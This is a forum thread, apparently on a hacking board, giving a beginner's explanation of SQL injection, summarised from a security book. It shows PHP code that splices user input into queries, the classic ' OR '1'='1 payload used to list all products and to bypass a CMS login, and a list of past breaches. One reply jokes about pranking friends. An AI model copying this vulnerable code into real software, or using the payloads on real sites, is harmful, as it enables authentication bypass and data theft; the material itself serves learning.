SQL INJECTION EXPLAINED [EXTREMELY DETAILED]

SQL INJECTION EXPLAINED

 
Introduction

Hello everyone! It is @Ghost. Today I will walk you through an in-depth explanation on the art of SQL Injection. SQL Injection is an extremely easy attack to perform, hence, most people watch a couple of tutorials online where some guy does an “Attack” in 7 minutes on Kali Linux. Just because you do this, that doesn't make you a blackhat hacker or an SQLi expert. Trust me, I made the same mistake of following random tutorials without mastering the fundamentals. In order to carry out advance SQL attacks, you need to have an intermediate to advance knowledge on SQL.
This will be a long thread so I can imagine people replying saying that I copy/pasted this which is understandable. The guide I am writing is a summarized version of Justin Clarke’s “SQL Injection – Attacks & Defense” a 500-page book. All code & images used in this thread are from his book. However, the thread is written by me. Not a single sentence is copied from the said book. If you want to cross-check be my guest. I’d be more than happy to send you the book. So, with that out of the way, Let's start.
 
What is SQL Injection?

SQL Injection is a vulnerability that occurs when an attacker is able to influence SQL queries for malicious purposes while it passes to the backend database. The attacker is able to influence what is passed on with the front end and the back end database. By doing so, he is able to gain extremely sensitive data such as usernames,passwords, locations, emails, IPs etc & also to dump the entire database of the website. Even though most websites use encryption to store their user’s passwords, with more high tech equipment with massive computational power becoming more & more available to the public, with the right equipment or outsourcing the hash cracking process a hacker is able to crack a very strong password within a couple of weeks at most. This is why SQL Injection is a very serious attack and why you should learn it if you want to become a good penetration tester.


 
Web Application Architecture
Before attacking a website, we must understand how the website operates and learn more about its architecture. Prior information about the target is extremely crucial in any attack, same goes with SQL Injection.
 
There are two main types of websites. Static websites and dynamic websites. A static website is a site coded purely using HTML, CSS or Javascript. Meanwhile, a dynamic site with a site that uses a database to store & retrieve data to make the website more interactive. Wix, Wordpress etc are all dynamic site builders while GatsbyJS, Jekyll are used to generate static websites.
 
In SQL Injection, we focus on dynamic or database-driven websites. The most common type of database drive site is an E-Commerce store. In a site like this, essential information like, customer ID, product ID, prices, address, phone number etc is stored in the sites database.
 
For example, say John signs up for an account on “X.com”, an E-Commerce store. When signing up, he provides information such as his full name, address, phone number etc. All this information will be stored in the client table of the website. When John wants to buy a pair of sunglasses, he searches for “Sunglasses” the website then locates all items related to the query, in this case, sunglasses from the sunglasses table in the product database. This is how a database operates in a dynamic website. Requesting queries and making updates in the database.
Heres an example PHP script that shows how the user input is passed to a dynamically created SQL statement.


// connect to the database
$conn = mysql_connect("localhost","username","password");
// dynamically build the sql statement with the input
$query = "SELECT * FROM Products WHERE Price < '$_GET["val"]' " .
"ORDER BY ProductDescription";
// execute the query against the database
$result = mysql_query($query);
// iterate through the record set
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
// display the results to the browser
echo "Description : {$row['ProductDescription']}
" .
"Product ID : {$row['ProductID']}
" .
"Price : {$row['Price']}

";
}
 
The example above shows how the SQL statement created by the PHP script. In the above case, the statement will return all products in the website’s databases with a value less than $100.
 
A web application mainly has three tiers.

• Presentation Tier: The rendering engine. (Example: Web browser)
  
• Logical Tier: Programming languages (C#, ASP, .NET, PHP)
  
• Storage Tier: A Database Management System (MySQL, Oracle, Microsoft SQL Server)
  

 
Figure 01: A simple three-tier architecture
 



 
The presentation tier, also know as the front end is what the user sees. It displaying various information related to browsing like prices, available products, discounts etc. The logical tier acts as a sperate layer and handles the web applications functionality buy performing high-level processing. The storage tier or backend, is where all the data is stored and retrieved from. This tier is independent from the presentation and logical tier.

 

Complex Web Application Architecture

The main drawback of using a three-tier model is that it is not scalable. Due to this reason, taking a concept of scalability and maintainability, the n-tier application development paradigm was created. Within this paradigm, a four-tier solution was built where a special element called an Application Server was added that the three-tier model did not possess. An application server is a server whose main function is to host application programming interfaces (APIs) to expose the operational logic and process for the use by other applications.
 
Figure 02: A Four-Tier Architecture
 



 
In the figure above, the web browser sends a specific request to the middle tier which is the logic, and then the logic calls the API from the application server and runs the request adding or retrieving data from the database. This is what happens simply in a four-tier model.


 
Diving Deep Into SQL Injection Attacks

SQL Injection is an attack where malicious SQL code is injected into the application, more commonly the input parameters which are then passed to the backed servers for execution. Due to the diverse nature of SQL, an attacker can code malicious code in many ways. Mainly and most commonly, direct insertion of code into concatenated parameters with SQL commands in the technique used. However, A less direct attack would be to inject malicious code into the string which are inbound to be stored in the database and once it has been stored to be executed. An attacker is able to modify SQL statements where he receives the same rights as the application user.
 
I will explain this using the previous example. (products less than $100)
http://www.victimwebsite.com/products.php?val=100
We will now see how you can inject your own SQL commands by inserting them into the input parameter which can be done by appending the string ‘OR ‘1’ = ‘1 in the URL.
http://www.victimwebsite.com/products/su...p?val=100’ OR ‘1’ = ‘1
When you run this URL, the PHP script will execute and return all the products that are in the database ignoring their prices. This happens because we modified and altered the logic of the query.
This is the query that was built:

SELECT *
FROM ProductsTbl
WHERE Price < '100.00' OR '1'='1'
ORDER BY ProductDescription;
 

This example of how an attacker can manipulate a SQL statement and gain access to data that should not be accessible to anyone.

 
Content Management Systems (CMS)

A content management system is basically a web application which is used to manage and publish content to a website without having any form of coding knowledge. 
Accessing the CMS application:
http://www.victimwebsite.com/cms/login.php?username=root&password=pass
In order to access a CMS’s functionality, it requires you to login with valid credentials; if not, a login error would occur.

// connect to the database
$conn = mysql_connect("localhost","username","password");
// dynamically build the sql statement with the input
$query = "SELECT userid FROM CMSUsers WHERE user = '$_GET["user"]' " .
"AND password = '$_GET["password"]'";
// execute the query against the database
$result = mysql_query($query);
// check to see how many rows were returned from the database
$rowcount = mysql_num_rows($result);
// if a row is returned then the credentials must be valid, so
// forward the user to the admin pages
if ($rowcount != 0){ header("Location: admin.php");}
// if a row is not returned then the credentials must be invalid
else { die('Incorrect username or password, please try again.')}

 
Here is the SQL statement that the PHP script builds and executes:

SELECT userid
FROM CMSUsers
WHERE user = 'root' AND password = 'pass';
 Similar to what we did earlier, we can modify the logic of the query so that we can obtain all “userid”s.
http://www.victimwebsite.com/cms/login.php?username=root&password=pass’ OR ‘1’ = ‘1
 
This is the query that will be built executed:
SELECT userid
FROM CMSUsers
WHERE user = 'root' AND password = 'pass' OR '1'='1';
If the database returns more than zero records, that means our logic is correct and our script has been give access to the admin.php script.
 
High Profile Incidents
[spoiler]
In February 2002, Jeremiah Jacks (www.securityfocus.com/news/346) discovered that Guess.com was vulnerable to SQL injection. He gained access to at least 200,000 customers’ credit card details.
In June 2003, Jeremiah Jacks struck again, this time at PetCo.com (www.securityfocus.com/news/6194), where he gained access to 500,000 credit card details via an SQL injection flaw.
On June 17, 2005, MasterCard alerted some of its customers to a breach in the security of Card Systems Solutions. At the time, it was the largest known breach of its kind. By exploiting an SQL injection flaw (www.ftc.gov/os/caselist/0523148/
0523148complaint.pdf), a hacker gained access to 40 million credit card details.
In December 2005, Guidance Software, developer of EnCase, discovered that a hacker had compromised its database server via an SQL injection flaw (www.ftc.gov/os/caselist/0623057/0623057complaint.pdf), exposing the financial records of 3,800 customers.
Circa December 2006, the U.S. discount retailer TJX was successfully hacked and the attackers stole millions of payment card details from the TJX databases.
In August 2007, the United Nations Web site (www.un.org) was defaced via SQL injection vulnerability by an attacker in order to display anti-U.S. messages (http://news.cnet.com/8301-10784_3-9758843-7.html).
[/spoiler]
++++ THREAD WILL BE UPDATED WITHIN THE WEEK ++++

Beautifully detailed guide man, and a really great base for people to begin on that learning experience.
Thank you!

Of course only meant for people to prank their friends! :pepelaugh: lmao

Thank you for the kind comment @MrC. Appreciate it.